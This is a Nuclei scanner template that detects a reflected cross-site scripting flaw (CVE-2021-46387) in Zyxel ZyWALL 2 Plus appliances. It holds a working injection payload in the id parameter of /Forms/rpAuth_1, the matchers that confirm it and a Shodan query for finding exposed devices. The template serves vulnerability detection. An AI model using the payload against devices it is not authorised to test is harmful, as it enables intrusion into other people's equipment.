nuclei-templates/cves/2021/CVE-2021-46387.yaml

46 lines
1.4 KiB
YAML

id: CVE-2021-46387
info:
name: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting
author: DhiyaneshDk
severity: medium
description: ZyXEL ZyWALL 2 Plus Internet Security Appliance contains a cross-site scripting vulnerability. Insecure URI handling leads to bypass of security restrictions, which allows an attacker to execute arbitrary JavaScript codes to perform multiple attacks.
reference:
- https://www.exploit-db.com/exploits/50797
- https://www.zyxel.com/us/en/support/security_advisories.shtml
- https://drive.google.com/drive/folders/1_XfWBLqxT2Mqt7uB663Sjlc62pE8-rcN?usp=sharing
- https://nvd.nist.gov/vuln/detail/CVE-2021-46387
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-46387
cwe-id: CWE-79
metadata:
shodan-query: http.title:"Zywall2Plus"
tags: cve,cve2021,xss,zyxel,edb
requests:
- method: GET
path:
- '{{BaseURL}}/Forms/rpAuth_1?id=</form><iMg%20src=x%20onerror="prompt(document.domain)"><form>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<iMg src=x onerror="prompt(document.domain)"><form>'
- 'Entry Error'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
# Enhanced by mp on 2022/08/28